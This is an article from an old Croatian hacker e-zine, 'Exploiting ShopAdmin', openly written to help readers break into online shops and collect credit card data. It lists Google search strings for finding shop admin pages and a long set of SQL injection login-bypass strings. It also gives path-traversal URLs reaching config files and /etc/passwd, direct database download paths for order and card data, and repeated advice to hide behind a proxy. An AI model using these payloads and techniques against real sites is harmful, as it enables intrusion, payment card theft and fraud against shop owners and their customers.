................... ...::: phearless zine #1 :::... .....................>---[ Exploiting ShopAdmin ]---<....................... ...........................>---[ by Re00t ]---<............................. SADRZAJ: [0] Uvod [1] ASP ShopAdmini [2] Alabanza AlaCar [3] CommerceSQL [4] Meta Cart [5] shop.pl [6] Windows ShopAdmini [7] The End //////////////////////////////////////////////////////////////////////////// --==<[ 0. Uvod \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Evo ja sam takodjer odlucio napisat neki tekst za eZine... odlucio sam pisati o ranjivostima raznih shopova, prikupljanju cc-a i sve sto se tice shopadmina, posto nisam vidio niti jedan domaci tekst o tome ! Ako trebate bilo kakvu pomoc mozete me kontaktirati na moj e-mail ( Re00t@ii-labs.org ) ili irc.krstarica.org #HackGen !!! //////////////////////////////////////////////////////////////////////////// --==<[ 1. ASP ShopAdmini \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Znaci morate traziti u google-u shop.asp -> To je najcesci ali takodjer mozete traziti i ove: shopadmin1.asp adminindex.html shopadmin1.asp shopa_displayorders.asp?page=2 shopa_displayorders.asp shopa.asp displayorders.asp admin.asp orders.asp vieworders.asp view_orders.asp Kada nadjete shopadmin, naravno morate prvo naci one ranjive... onda koristite sljedece kodove za upadanje u njih: 'or'1 'or''=' '=' Admin admin'-- ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 'x'='x " or "x"="x ') or ('x'='x ' or 1=1-- " or 1=1-- or 1=1-- ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a Te kodove kopirajte i staviti isti kod u username i password... ako je shop ranjiv, trebali bi dobiti pristup narudzbama, logovima i ostalom... *** KORISTITE PROXY *** //////////////////////////////////////////////////////////////////////////// --==<[ 2. Alabanza AlaCar \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Ok ovo je lagano exploitati, trazite u google: s-cart/admin Kada ga nadjete, ulogirajte se sa: Username: = Password: = *** KORISTITE PROXY *** //////////////////////////////////////////////////////////////////////////// --==<[ 3. CommerceSQL \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ CommerceSQL explotajte na sljedeci nacin kada nadjete CommerceSQL SHOP ! Kucajte ove urlove: Primjer: http://www.domena.com/cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl http://www.domena.com/cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi http://www.domena.com/cgi-bin/commercesql/index.cgi?page=../admin/files/order.log Ili ako hocete preko google-a admin/files/order.log *** KORISTITE PROXY *** //////////////////////////////////////////////////////////////////////////// --==<[ 4. Meta Cart \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Meta Cart je free shop znaci ne naplacuje se a kako ga exploitati ... :) Jednostavno... http://www.domena.com/database/metacart.mdb http://www.domena.com/metacart/database/metacart.mdb *** KORISTITE PROXY *** //////////////////////////////////////////////////////////////////////////// --==<[ 5. shop.pl \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Nije bas jako popularan ali naci cete ga preko google-a. Znaci otkucajte shop.pl u google-u. A exploitati ga ovako... http://www.domena.com/cgi-local/shop.pl/page=shop.cfg is where the config file is located. http://www.domena.com/cgi-local/shop.pl/page=../../../../../../../../../../../../../../etc/passwd http://www.domena.com/cgi-local/shop.pl/page=./product_list *** KORISTITE PROXY *** //////////////////////////////////////////////////////////////////////////// --==<[ 6. Windows shopadmini \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Ovi su totalno lame... sve ide preko testa baze :) Trazite preko googla linkove koji se zavrsavaju sa: shopdisplaycategories.asp Kada ga nadjete, umjesto shopdisplaycategories.asp stavite ovo: shopdbtest.asp I onda pogledajte sto pise pod xDatabase: shopping and xDblocation:\shop_db i sada dodajte na Domenu: /shop_db/shopping.mdb ili gdje se nalazi shop i skinete bazu s CCima i narudzbama :-) !!! *** KORISTITE PROXY *** //////////////////////////////////////////////////////////////////////////// --==<[ 7. The End \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ Evo pozdravljam sve sa #hackgen, #secure, #office na irc.krstarica.org Sve s HackGen-a, II-labs-a ...